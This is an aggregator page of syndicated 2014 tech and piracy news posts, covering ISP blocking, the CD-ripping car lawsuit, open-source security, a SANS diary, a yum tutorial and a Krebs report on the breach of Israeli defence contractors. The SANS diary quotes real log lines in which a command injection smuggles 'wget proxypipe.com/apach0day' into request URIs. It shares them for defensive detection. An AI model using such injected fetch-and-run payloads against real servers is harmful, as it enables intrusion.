Posts tagged ‘Other’

TorrentFreak: Block The Pirate Bay Within 3 Days, Austrian ISPs Told

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Kino.to, one of Germany’s largest illegal streaming portals, was shut down during 2011 following the largest law enforcement action of its type in Europe. But even with the site long gone, the disruption it caused is about to affect The Pirate Bay and two other major sites.

Just a month before Kino.to was dismantled in June 2011, Austrian ISP ‘UPC’ was served with a preliminary injunction ordering it to block subscriber access to the site. Verein für Anti-Piraterie der österreichischen Film und Videobranche (VAP) – the anti-piracy association of the Austrian film and video industry – had been on the warpath since 2010 and had finally got their way after UPC refused to comply voluntarily.

But would blocking the site be legal? UPC insisted that it couldn’t be held responsible for a site it had nothing to do with. The ISP also maintained that there had been no court ruling determining that UPC customers who accessed Kino.to were breaking the law.

To settle the matter once and for all the Austrian Supreme Court asked the European Court of Justice to clarify whether a company that provides Internet access to people using an illegal website could be required to block that site. On March 27, 2014, the ECJ handed down its decision.

On UPC’s first point the Court said that EU law does not require a specific relationship between the person infringing copyright and the intermediary against whom any injunction had been issued. On the second point the Court said that proof of illegality was not necessary as the law exists not only to bring an end to infringement, but also to prevent it.

The key point of the ruling was that ISPs can indeed be required to block access to infringing sites provided that injunctions are both balanced and proportional. As a result, earlier this month Austria’s Supreme Court found that the blockade against Kino.to, even though the site is long dead, was correctly applied.

On the back of this ruling, this week VAP wrote to several local ISPs, UPC included, demanding a new blockade of three domains – ThePirateBay.se, Movie4K.to and Kinox.to, a site that took over from Kino.to.

“Letters dated yesterday have been sent to four large ISPs containing a request to block a small number of websites,” VAP Managing Director Werner Müller told Future Zone.

On behalf of three local movie companies (Allegro Film, Wega Film and Epo Film) VAP has requested IP address and DNS blocks of the three sites but has given the ISPs very little time in which to carry them out: by this Friday, August 1, to be exact.

The Association of Internet Service Providers Austria (ISPA) feels the deadline is far too restrictive.

“The period given to the providers to act is ludicrously short. We see this as very problematic. Extreme pressure is being exerted,” Secretary General Maximilian Schubert said.

“Two working days during the holiday season is just too little. To implement this by Friday we deem too difficult.”

Interestingly, Schubert also sees differences between The Pirate Bay and the pair of streaming portals listed in VAP’s blocking request.

“There is also legal content on The Pirate Bay,” Schubert said.

Discussions between VAP and the ISPs are scheduled for later in the week, so whether the anti-piracy group will get its way immediately remains to be seen. They’ve waited years already; another few days shouldn’t make much difference.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Police Begin Placing Warning Adverts on ‘Pirate’ Sites

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

For a year, City of London Police have been working with the music and movie industries on initiatives to cut down on the consumption of pirated content online.

Operation Creative employs a multi-pronged approach, seeking to educate consumers while making life difficult for sites that operate unlicensed services.

Many unauthorized sites generate revenue from advertising, so the Police Intellectual Property Crime Unit (PIPCU) informs potential advertisers on how to keep their promotions away, thus depriving sites of cash. Another key aim is to stop users from getting the impression that pirate sites have “big brand” support when household names are seen advertising.

Today, PIPCU officially announced the launch of another angle to their ad strategy. As reported by TF in April, police are now placing their own ads on pirate sites to warn users that the site they’re using has been reported.

“This new initiative is another step forward for the unit in tackling IP crime and disrupting criminal profits,” said Head of PIPCU, DCI Andy Fyfe.

“Copyright infringing websites are making huge sums of money through advert placement, therefore disrupting advertising on these sites is crucial and this is why it is an integral part of Operation Creative.”

Sample police ad

As shown below, the BBC has published a PIPCU-supplied screenshot of how the ads look on an unauthorized MP3 site known as Full-Albums.net.

[Screenshot: PIPCU warning ad displayed on Full-Albums.net]

In our tests we couldn’t replicate the banners, despite dozens of refreshes, so it’s possible the site took action to remove them. Needless to say, we did see other advertising, and very interesting it was too.

Ironically, by clicking album links on Full-Albums we were presented with ads from BearShare, a music service that struck deals with the RIAA in the last decade. As can be seen from the screenshot below, the service places the major labels’ logos prominently to attract customers, even when accessed from a UK IP address.

[Screenshot: BearShare ads displayed on Full-Albums.net]

TF checked with the BPI on the licensing status of the service in the UK and will update this article when their statement arrives, but as can be seen from this quote from the BearShare site, they claim to be legal.

“Using BearShare is 100% legal. The service employs state of the art filtering technology, and is approved by the major record labels and RIAA. Downloading from BearShare is entirely legal, and will not get you in any kind of trouble whatsoever,” the service says.

If BearShare is licensed, this raises the possibility that the labels are indirectly financing ads on pirate sites themselves, something they’ll want to remedy quickly.

Ads on other sites

PIPCU, who have partnered with content verification technology provider ‘Project Sunblock’ to place the warning ads, say their banners are “now replacing a wide range of legitimate brand adverts on infringing websites.”

So, determined to find examples of the police advertising, we began moving through sites with the most copyright complaints as per Google’s Transparency Report.

Unfortunately we were unable to view a single PIPCU banner. However, as shown in the screenshot below, we did get some interesting results on MP3Juices, a site for which the BPI has sent 1,206,000+ takedowns to Google.

[Screenshot: Sky Bet ad displayed on MP3Juices]

Skybet is not only a subsidiary of broadcasting giant BSkyB, but the company is also a leading member of the Federation Against Copyright Theft. In turn, FACT is a key Operation Creative partner. While Sky Bet wasn’t the only gambling advertiser on the site, this ad placement means that BSkyB are currently helping to finance the very sites that PIPCU are trying to close down.

There’s absolutely no suggestion that Sky or the major labels via BearShare are deliberately trying to finance pirate sites, but the above examples show just how difficult it’s going to be to keep major brands’ advertising off these sites, even when they are acutely aware of the problems.

Errata Security: Cliché: open-source is secure

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Some in cybersec keep claiming that open-source is inherently more secure or trustworthy than closed-source. This is demonstrably false.

Firstly, there is the problem of usability. Unusable crypto isn’t a valid option for most users. Most would rather not communicate at all, or risk going to jail, than deal with the typical dependency hell of trying to get open-source to compile. Moreover, open-source apps are notoriously user-hostile, which is why the Linux desktop still hasn’t made headway against Windows or Macintosh. The reason is that developers blame users for being stupid for not appreciating how easy their apps are, whereas Microsoft and Apple spend $billions in usability studies actually listening to users. Desktops like Ubuntu are pretty good — but only when they exactly copy Windows/Macintosh. Ubuntu still doesn’t invest in the usability studies that Microsoft/Apple do.

The second problem is deterministic builds. If I want to install an app on my iPhone or Android, the only usable way is through their app stores. This means downloading the binary, not the source. Without deterministic builds, there is no way to verify that the downloaded binary matches the public source. The binary may, in fact, be compiled from different source containing a backdoor. This means a malicious company (or an FBI NSL letter) can backdoor open-source binaries as easily as closed-source binaries.

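
The deterministic-build verification described above can be sketched in a few lines of shell. This is a minimal illustration, not a real build pipeline: two byte-identical stand-in files play the roles of the app-store download and a local rebuild from the public source.

```shell
#!/bin/sh
# Sketch of the check that deterministic builds make possible: hash the
# downloaded binary and a binary rebuilt locally from the public source,
# then compare. Stand-in files simulate the matching case.
printf 'pretend-binary-v1.0' > /tmp/vendor_binary    # what the app store served
printf 'pretend-binary-v1.0' > /tmp/local_rebuild    # what we rebuilt from source
vendor_hash=$(sha256sum /tmp/vendor_binary | cut -d' ' -f1)
local_hash=$(sha256sum /tmp/local_rebuild | cut -d' ' -f1)
if [ "$vendor_hash" = "$local_hash" ]; then
    echo "MATCH: binary corresponds to the public source"
else
    echo "MISMATCH: binary may have been built from different source"
fi
```

Without deterministic builds, the local rebuild never matches bit-for-bit (timestamps, build paths, and compiler noise creep in), so this comparison proves nothing; that is exactly the gap being described.
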
The third problem is code-review. People trust open-source because they can see for themselves if it has any bugs. Or, if not themselves, they have faith that others are looking at the code (“many eyes makes bugs shallow”). Yet, this rarely happens. We repeatedly see bugs giving backdoor access (‘vulns’) that remain undetected in open-source projects for years, such as the OpenSSL Heartbleed bug. The simple fact is that people aren’t looking at open-source. Those qualified to review code would rather be writing their own code. The opposite is true for closed-source, where they pay people to review code. While engineers won’t review code for fame/glory, they will for money. Given two products, one open and the other closed, it’s impossible to guess which has had more “eyes” looking at the source — in many cases, it’s the closed-source that has been better reviewed.

What’s funny about this open-source bigotry is that it leads to very bad solutions. A lot of people I know use the libpurple open-source library and the jabber.ccc.de server (run by CCC hacking club). People have reviewed the libpurple source and have found it extremely buggy, and chat apps don’t pin SSL certificates, meaning any SSL encryption to the CCC server can easily be intercepted. In other words, the open-source alternative is known to be incredibly insecure, yet people still use it, because “everyone knows” that open-source is more secure than closed-source.

Wickr and SilentCircle are two secure messaging/phone apps that I use, for the simple fact that they work both on Android and iPhone, and both are easy to use. I’ve read their crypto algorithms, so I have some assurance that they are doing things right. SilentCircle has open-sourced part of their code, which looks horrible, so it’s probable they have some 0day lurking in there somewhere, but it’s really no worse than equivalent code. I do know that both companies have spent considerable resources on code review, so I know at least as many “eyes” have reviewed their code as open-source. Even if they showed me their source, I’m not going to read it all — I’ve got more important things to do, like write my own source.

Thus, I see no benefit to open-source in this case. Except for Cryptocat, all the open-source messaging apps I’ve used have been buggy and hard to use. But, you can easily change my mind: just demonstrate an open-source app where more eyes have reviewed the code, or a project that has deterministic builds, or a project that is easier to use, or some other measurable benefit.

Of course, I write this as if the argument was about the benefits of open-source. We all know this doesn’t matter. As the EFF teaches us, it’s not about benefits, but about which is ideologically pure: that open-source is inherently more ethical than closed-source.

SANS Internet Storm Center, InfoCON: green: Interesting HTTP User Agent “chroot-apach0day”, (Mon, Jul 28th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Our reader Robin submitted the following detect:

I’ve got a site that was scanned this morning by a tool that left these entries in the logs:
[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day  

The URL that appears to be retrieved does not exist, even though the domain does.

In our own web logs, we have seen a couple of similar requests:

162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"

If anybody has any ideas about what tool causes these entries, please let us know. Right now, it doesn’t look like this is indeed an “Apache 0 Day”.

There are a couple of other security-related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.
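
Checking your own logs for this scanner only takes a grep on the user-agent string. Here is a quick sketch against the sample entries quoted above; the `/tmp` sample file is a stand-in for a real access log, whose path will vary by server.

```shell
#!/bin/sh
# Sketch: count requests carrying the "chroot-apach0day" user agent and
# list the offending client IPs. The sample log reuses the entries from
# the diary; point grep at your real access log in practice.
log=/tmp/access_sample.log
cat > "$log" <<'EOF'
162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"
EOF
grep 'chroot-apach0day' "$log" | awk '{print $1}' | sort -u   # offending IPs
echo "suspicious requests: $(grep -c 'chroot-apach0day' "$log")"
```

The same one-liner works in the combined log format of both Apache and nginx, since the user agent is the last quoted field on each line.
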


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Linux How-Tos and Linux Tutorials: How to Simplify Linux Package Installation With Yum Groups

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Don Crawley. Original post: at Linux How-Tos and Linux Tutorials

Most Linux admins are aware of the yum (Yellowdog Updater, Modified) utility for package management in Red Hat-based distros such as RHEL, CentOS, and Fedora. Few, however, are aware of the power, benefits, and utility of yum groups. In addition to installing individual packages, yum can also install and manage groups of packages through its groupinstall feature, a part of yum groups. By using yum groups, it’s not necessary for you to manually install related packages individually. For example, the yum group “Web Server” not only installs httpd, it also installs crypto-utils, httpd-manual, mod_perl, mod_ssl, mod_wsgi, and webalizer, plus all their dependencies.

The following tutorial is based on CentOS 6.5 and should work with other versions of Red Hat-based distros. Older versions may require that you install yum-utils in order to use yum groups.

A free companion video for this guide is available at http://youtu.be/0ab17Sh-LM0.

Package Management through Groups

In the following steps, you will learn how to list available groups, install a group, and remove a group.

  1. Use the command yum grouplist to see a list of all the available package groups.

[Screenshot: yum grouplist output]

  2. Now, add a grep filter to look for groups related to “Web” by using the command yum grouplist | grep Web (Remember, everything in Linux is case-sensitive.)

[Screenshot: yum grouplist | grep Web output]

  3. Use yum groups to install the Web Server group with the following command:
    yum groupinstall "Web Server"
    (Notice the use of quotation marks around the group name since it consists of two words. Also, notice that the two words are capitalized.) Stand up and stretch while this installation takes place. It has to download and install 34 packages, which takes about a minute, depending on your connection speed and your computer’s speed. Do some shoulder rolls and neck rolls while this takes place. Seriously.

[Screenshot: yum groupinstall "Web Server" output]

  4. When it’s finished, as usual, it will return a command prompt. In the following screen capture, you can see all the packages it installed. Obviously, even with automatic dependency installation, this is still a lot less work than installing the packages manually.

[Screenshot: packages installed by yum groupinstall "Web Server"]

  5. Now, remove the group with the command yum groupremove "Web Server"

[Screenshot: yum groupremove "Web Server" output]

As with yum groupinstall, the process of uninstalling packages is much easier with yum groupremove.

An obvious disadvantage to using yum groups is that it installs a lot of packages, some of which you may not need or want. Yum groups, however, is a great way to teach yourself about various packages that you might want to use on a particular type of server. Ultimately, you’ll probably perform customized, manual package installations. During your learning process, yum groups can provide many insights into available packages.
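
The steps above can be collapsed into one short non-interactive script. This is a sketch that assumes a Red Hat-based system: the `-y` flag answers yum’s confirmation prompts, and the `command -v` guard lets the script degrade gracefully on machines where yum isn’t installed.

```shell
#!/bin/sh
# Sketch: the grouplist / groupinstall / groupremove cycle from the
# tutorial as one non-interactive run. Requires root on a real system.
status_file=/tmp/yum_group_demo.status
if command -v yum >/dev/null 2>&1; then
    yum grouplist | grep -i Web              # find web-related groups
    yum -y groupinstall "Web Server"         # -y answers the confirmation prompt
    yum -y groupremove "Web Server"
    echo "demo complete" > "$status_file"
else
    echo "yum not available; skipped" > "$status_file"
fi
cat "$status_file"
```

Scripting the cycle this way is handy for building and tearing down throwaway lab servers, which is exactly the learning scenario yum groups is best suited for.
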

Excerpted from the newly expanded and updated The Accidental Administrator: Linux Server Step-by-Step Configuration Guide, 2nd Edition by Don R. Crawley.

Don R. Crawley is author of The Accidental Administrator series of books for IT professionals including The Accidental Administrator: Linux Server Step-by-Step Configuration Guide and president of soundtraining.net, a Seattle, Washington-based IT publishing and training firm. He is a veteran IT guy with over 40 years’ experience in technology for the workplace. He holds multiple certifications including Linux+ and IPv6 Silver Engineer. He tweets @doncrawley and blogs at www.soundtraining.net/blog. Don can be reached at (206) 988-5858, www.soundtraining.net, or don@soundtraining.net.

TorrentFreak: Ford and General Motors Sued Over ‘CD Ripping Cars’

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

A quarter century ago the music industry was confronted with a new threat – digital audio tape (DAT) recorders.

These devices were able to make “near perfect” copies of any audio recording and the RIAA and others feared this would be the end of the recorded music industry.

The record labels took their fears to Congress, which eventually resulted in the Audio Home Recording Act (AHRA) of 1992. Under this law importers and manufacturers have to pay royalties on “digital audio recording devices,” among other things.

The legislation also applies to some newer recording devices common today, which is now causing trouble for Ford and General Motors. Both companies ship cars with the ability to rip CDs onto internal hard drives, and according to a coalition of artists and record companies this violates copyright law.

The Alliance of Artists and Recording Companies (AARC), which lists major record labels and 300,000 artists among its members, filed a class action lawsuit on Friday in which they demand millions of dollars in compensation.

TorrentFreak obtained a copy of the complaint (pdf) which states that Ford’s “Jukebox” device and General Motors’ “Hard Drive Device” allow consumers to rip CDs onto an internal hard drive. According to the music group these devices fall under the Audio Home Recording Act and the car companies are therefore required to pay royalties.

Thus far, neither Ford nor General Motors has complied with any requirements of the Act. Both companies have sold cars with these devices for several years on a variety of models including the Lincoln MKS, Ford Taurus, Ford Explorer, Buick LaCrosse, Cadillac SRX, Chevrolet Volt, and GMC Terrain.

In addition to the two car companies, the lawsuit also targets their technology partners Denso and Clarion. Commenting on the dispute the AARC notes that a class action lawsuit was unavoidable.

“Twenty-two years ago, cooperation between music creators and device manufacturers resulted in legislation that led to a digital electronics revolution. But having reaped the benefits of this bargain, Ford, GM, Denso, and Clarion have now decided to ignore their obligations to music creators and declare themselves above the law,” AARC Executive Director Linda Bocchi comments.

“While no one likes litigation, Ford, GM, Denso, and Clarion have stonewalled long enough, and we are determined to collect the royalties our members – and all artists and music creators with rights under the AHRA – are owed,” Bocchi adds.

The artists and record labels are looking for both actual and statutory damages, which could amount to hundreds of millions of dollars. In addition, they want to prevent the manufacturers from selling these unauthorized devices in their cars.

The case will prove to be an interesting test of the legality of “recording” devices in car entertainment systems. As is usually true, the law is not as black and white as AARC’s complaint states.

For example, the lawsuit doesn’t mention that the Audio Home Recording Act includes various exemptions for personal use and for recording equipment that’s part of a larger device, such as CD-burners in computers.

It’s now up to the court to decide how cars fit into this picture.

Krebs on Security: Hackers Plundered Israeli Defense Firms that Built ‘Iron Dome’ Missile Defense System

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Three Israeli defense contractors responsible for building the “Iron Dome” missile shield currently protecting Israel from a barrage of rocket attacks were compromised by hackers and robbed of huge quantities of sensitive documents pertaining to the shield technology, KrebsOnSecurity has learned.

The never-before-publicized intrusions, which occurred between 2011 and 2012, illustrate the continued challenges that defense contractors and other companies face in deterring organized cyber adversaries and preventing the theft of proprietary information.

A component of the ‘Iron Dome’ anti-missile system in operation, 2011.

According to Columbia, Md.-based threat intelligence firm Cyber Engineering Services Inc. (CyberESI), between Oct. 10, 2011 and Aug. 13, 2012, attackers thought to be operating out of China hacked into the corporate networks of three top Israeli defense technology companies, including Elisra Group, Israel Aerospace Industries, and Rafael Advanced Defense Systems.

By tapping into the secret communications infrastructure set up by the hackers, CyberESI determined that the attackers exfiltrated large amounts of data from the three companies. Most of the information was intellectual property pertaining to Arrow III missiles, Unmanned Aerial Vehicles (UAVs), ballistic rockets, and other technical documents in the same fields of study.

Joseph Drissel, CyberESI’s founder and chief executive, said the nature of the exfiltrated data and the industry that these companies are involved in suggests that the Chinese hackers were looking for information related to Israel’s all-weather air defense system called Iron Dome.

The Israeli government has credited Iron Dome with intercepting approximately one-fifth of the more than 2,000 rockets that Palestinian militants have fired at Israel during the current conflict. The U.S. Congress is currently wrangling over legislation that would send more than $350 million to Israel to further development and deployment of the missile shield technology. If approved, that funding boost would make nearly $1 billion from the United States over five years for Iron Dome production, according to The Washington Post.

Neither Elisra nor Rafael responded to requests for comment about the apparent security breaches. A spokesperson for Israel Aerospace Industries brushed off CyberESI’s finding, calling it “old news.” When pressed to provide links to any media coverage of such a breach, IAI was unable to locate or point to specific stories. The company declined to say whether it had alerted any of its U.S. industry partners about the breach, and it refused to answer any direct questions regarding the incident.

“At the time, the issue was treated as required by the applicable rules and procedures,” IAI Spokeswoman Eliana Fishler wrote in an email to KrebsOnSecurity. “The information was reported to the appropriate authorities. IAI undertook corrective actions in order to prevent such incidents in the future.”

Drissel said many of the documents that were stolen from the defense contractors are designated with markings indicating that their access and sharing is restricted by International Traffic in Arms Regulations (ITAR) — U.S. State Department controls that regulate the defense industry. For example, Drissel said, among the data that hackers stole from IAI is a 900-page document that provides detailed schematics and specifications for the Arrow 3 missile.

“Most of the technology in the Arrow 3 wasn’t designed by Israel, but by Boeing and other U.S. defense contractors,” Drissel said. “We transferred this technology to them, and they coughed it all up. In the process, they essentially gave up a bunch of stuff that’s probably being used in our systems as well.”

WHAT WAS STOLEN, AND BY WHOM?

According to CyberESI, IAI was initially breached on April 16, 2012 by a series of specially crafted email phishing attacks. Drissel said the attacks bore all of the hallmarks of the “Comment Crew,” a prolific and state-sponsored hacking group associated with the Chinese People’s Liberation Army (PLA) and credited with stealing terabytes of data from defense contractors and U.S. corporations.

Image: FBI

The Comment Crew is the same hacking outfit profiled in a February 2013 report by Alexandria, Va.-based incident response firm Mandiant, which referred to the group simply by its official designation — “P.L.A. Unit 61398.” In May 2014, the U.S. Justice Department charged five prominent military members of the Comment Crew with a raft of criminal hacking and espionage offenses against U.S. firms.

Once inside IAI’s network, Comment Crew members spent the next four months in 2012 using their access to install various tools and trojan horse programs on systems throughout the company’s network and expanding their access to sensitive files, CyberESI said. The actors compromised privileged credentials, dumped password hashes, and gathered system, file, and network information for several systems. The actors also successfully used tools to dump Active Directory data from domain controllers on at least two different domains on IAI’s network.

All told, CyberESI was able to identify and acquire more than 700 files — totaling 762 MB — that were exfiltrated from IAI’s network during the compromise. The security firm said most of the data acquired was intellectual property and likely represented only a small portion of the entire data loss suffered by IAI.

“The intellectual property was in the form of Word documents, PowerPoint presentations, spreadsheets, email messages, files in portable document format (PDF), scripts, and binary executable files,” CyberESI wrote in a lengthy report produced about the breaches.

“Once the actors established a foothold in the victim’s network, they are usually able to compromise local and domain privileged accounts, which then allow them to move laterally on the network and infect additional systems,” the report continues. “The actors acquire the credentials of the local administrator accounts by using hash dumping tools. They can also use common local administrator account credentials to infect other systems with Trojans. They may also run hash dumping tools on Domain Controllers, which compromises most if not all of the password hashes being used in the network. The actors can also deploy keystroke loggers on user systems, which captured passwords to other non-Windows devices on the network.”

The attackers followed a similar modus operandi in targeting Elisra, a breach which CyberESI says began in October 2011 and persisted intermittently until July 2012. The security firm said the attackers infiltrated and copied the emails for many of Elisra’s top executives, including the CEO, the chief technology officer (CTO) and multiple vice presidents within the company.

CyberESI notes it is likely that the attackers were going after persons of interest with access to sensitive information within Elisra, and/or were gathering would-be targets for future spear-phishing campaigns.

Drissel said that, as with many other intellectual property breaches the company has detected over the years, neither the victim firms nor the U.S. government provided any response after CyberESI alerted them to the breaches at the time.

“The reason that nobody wants to talk about this is people don’t want to re-victimize the victim,” Drissel said. “But the real victims here are the people on the other end who are put in harm’s way because of poor posture on security and the lack of urgency coming from a lot of folks on how to fix this problem. So many companies have become accustomed to low-budget IT costs. But the reality is that if you have certain sensitive information, you’ve got to spend a certain amount of money to secure it.”

ANALYSIS

While some of the world’s largest defense contractors have spent hundreds of millions of dollars and several years learning how to quickly detect and respond to such sophisticated cyber attacks, it’s debatable whether this approach can or should scale for smaller firms.

Michael Assante, project lead for Industrial Control System (ICS) and Supervisory Control and Data Acquisition (SCADA) security at the SANS Institute, said although there is a great deal of discussion in the security industry about increased information sharing as the answer to detecting these types of intrusions more quickly, this is only a small part of the overall solution.

“We collectively talk about all of the things that we should be doing better — that we need to have better security policies, better information sharing, better detection, and we’re laying down the tome and saying ‘Do all of these things’,” Assante said. “And maybe a $100 million security program can do all these things well or make progress against these types of attacks, but that 80-person defense contractor? Not so much.”

Assante said most companies in the intelligence and defense industries have gotten better at sharing information and at the so-called “cyber counter-intelligence” aspect of these attacks: Namely, in identifying the threat actors, tactics and techniques of the various state-sponsored organizations responsible. But he noted that most organizations still struggle with the front end of the problem: Identifying the original intrusion and preventing the initial compromise from blossoming into a much bigger problem.

“I don’t think we’ve improved much in that regard, where the core challenges are customized malware, persistent activity, and a lot of noise,” Assante said. “Better and broader notification [by companies like CyberESI] would be great, but the problem is that typically these notifications come after sensitive data has already been exfiltrated from the victim organization. Based on the nature of advanced persistent threats, you can’t beat that time cycle. Well, you might be able to, but the amount of investment needed to change that is tremendous.”

Ultimately, securing sensitive systems from advanced, nation-state level attacks may require a completely different approach. After all, as Einstein said, “We cannot solve our problems with the same thinking we used when we created them.”

Indeed, that appears to be the major thrust of a report released this month by Richard J. Danzig, a board member of the Center for New American Security. In “Surviving on a Diet of Poison Fruit,” (PDF) Danzig notes that defensive efforts in major mature systems have grown more sophisticated and effective.

“However, competition is continuous between attackers and defender,” he wrote. “Moreover, as new information technologies develop we are not making concomitant investments in their protection. As a result, cyber insecurities are generally growing, and are likely to continue to grow, faster than security measures.”

In his conclusion, Danzig offers a range of broad (and challenging) suggestions, including this gem, which emphasizes placing a premium on security over ease-of-use and convenience in mission-critical government systems:

“For critical U.S. government systems, presume cyber vulnerability and design organizations, operations and acquisitions to compensate for this vulnerability. Do this by a four-part strategy of abnegation, use of out-of-band architectures, diversification and graceful degradation. Pursue the first path by stripping the ‘nice to have’ away from the essential, limiting cyber capabilities in order to minimize cyber vulnerabilities. For the second, create non-cyber interventions in cyber systems. For the third, encourage different cyber dependencies in different systems so single vulnerabilities are less likely to result in widespread failure or compromise. And for the fourth, invest in discovery and recovery capabilities. To implement these approaches, train key personnel in both operations and security so as to facilitate self-conscious and well-informed tradeoffs between the security gains and the operational and economic costs from pursuing these strategies.”

Source: Center for New American Security


TorrentFreak: “Scared” Pirates Delayed Release of Expendables 3

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Last week saw the leak online of the brand new Expendables movie.

Earmarked for an August 15 U.S. release, Expendables 3 leaked in near DVD quality a full two weeks ahead. The timing and quality combined to make the leak one of the most prominent in recent years.

While the original sources of these leaks are nearly always shrouded in mystery, once made publicly available on sites like The Pirate Bay they are anyone’s for download.

Originally it was believed that Pirate Bay releaser Drarbg uploaded the first public torrent, but that was not the case. Flying under the radar, a far less popular torrent (still with only a handful of seeds) actually preceded it by almost 20 minutes.

exp-charles

It’s certainly feasible that another release preceded even this one, but with torrents on sites other than Pirate Bay regularly deleted due to copyright complaints, it’s now too late for any certainty.

It’s also impossible to say how many people were in the chain after the leak and before the first public torrent upload, but numerous public sources (including RARBG themselves) are now pointing to postings on 4chan as indicating the start of events.

The thread is right here and obviously everything happened in public. The postings don’t specifically mention the title of the movie but a source close to the situation assures TF that the chat does indeed refer to The Expendables 3.

4chan-1

Less than two hours after his initial posting on July 15, ‘Anonymous’ was back on 4chan with an update.

“I am in contact with a release group that works with private trackers. They asked me for proof of what I had and I took pictures with a written timestamp of the disc in and out of the box,” he wrote.

“I dumped them into some special submission link they had and they will get back to me. I’m just waiting in a secured IRC room for them to get back to me once the staff takes a look.”

Precisely what happened after that is a mystery (as is the leaker’s apparent disregard for security in posting publicly), but a source informs TF that whoever obtained the copy knew they had something hot – perhaps too hot.

“We know that the leak was back then, around July 15, but everyone was scared to leak it. Most private groups had it for more than 10 days, but again they were scared to leak it,” TF was told.

After the leaked copy was allegedly handed over July 15, the comments of ‘Anonymous’ as he returned to 4chan predicted the events of last Thursday.

“Keep an eye out for the leak. No telling how long this will take, but I’m sure it will make its way to public trackers due to the demand for it,” he wrote.

Interestingly, although initial demand for The Expendables 3 was brisk, downloads now sit at an estimated 500,000, and it’s currently less popular on file-sharing networks than “Divergent” which was released on the same day.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Top 10 Most Pirated Movies of The Week – 07/28/14

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

expendablesThis week we have three newcomers in our chart.

The Expendables 3, which leaked several weeks before the official premiere, is the most downloaded movie this week.

The data for our weekly download chart is estimated by TorrentFreak, and is for informational and educational reference only. All the movies in the list are BD/DVDrips unless stated otherwise.

RSS feed for the weekly movie download chart.

Ranking (last week) Movie IMDb Rating / Trailer
1 (…) The Expendables 3 (DVDscr) ?.? / trailer
2 (…) Divergent 7.2 / trailer
3 (2) The Other Woman 6.5 / trailer
4 (1) Need For Speed 7.1 / trailer
5 (8) The Amazing Spider-Man 2 7.4 / trailer
6 (5) Transformers: Age of Extinction (HDTS) 6.3 / trailer
7 (4) Noah 6.3 / trailer
8 (…) Dawn of the Planet of the Apes (TS) 8.3 / trailer
9 (3) Transcendence 6.4 / trailer
10 (…) Hercules Reborn 3.4 / trailer

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Anchor Managed Hosting: OpenStack – the open cloud

This post was syndicated from: Anchor Managed Hosting and was written by: Bart Thomas. Original post: at Anchor Managed Hosting

suitcase-cloudNo one likes vendor lock-in. It’s an artificial limitation on technology, designed to benefit the vendor, not the customer.

The restrictions may seem insignificant on day one, when the technology may appear to be the best option currently available. But the world keeps spinning and technology keeps evolving, until you’re stuck with a platform that cannot appropriately adapt to suit your new situation without considerable expense.

The big, proprietary public cloud vendors of today didn’t invent vendor lock-in, but they certainly know how to work it to their advantage.

Cloud computing isn’t owned by anyone. Companies locked into a proprietary cloud service lose the flexibility needed to make good business decisions, making vendor lock-in a real threat to your competitive advantage. What might put you ahead one day can hold you back the next.

Open Source standards

Cloud computing may have ushered in huge benefits to businesses everywhere, powering many of the world’s biggest websites and services. But until OpenStack arrived, cloud technology still struggled to address two of the most important customer expectations — freedom of choice and workload portability.

OpenStack is the only cloud platform that threatens to break the market stranglehold of the proprietary cloud vendors. In case you hadn’t noticed, Microsoft, Amazon and Google aren’t big on transparency, interoperability and open standards.

Why should you care about open standards? Because it is risky to buy services from a single vendor. Vendor-owned ecosystems often drift into irrelevancy.

Before OpenStack came on the scene, one cloud platform wasn’t necessarily compatible, or even comparable, with another. Each solved the various software problems in different ways, requiring different code modifications and different architecture to achieve the best results.

And that meant it wasn’t so easy to switch providers as your needs changed.

“Oh, but you can’t take that with you”

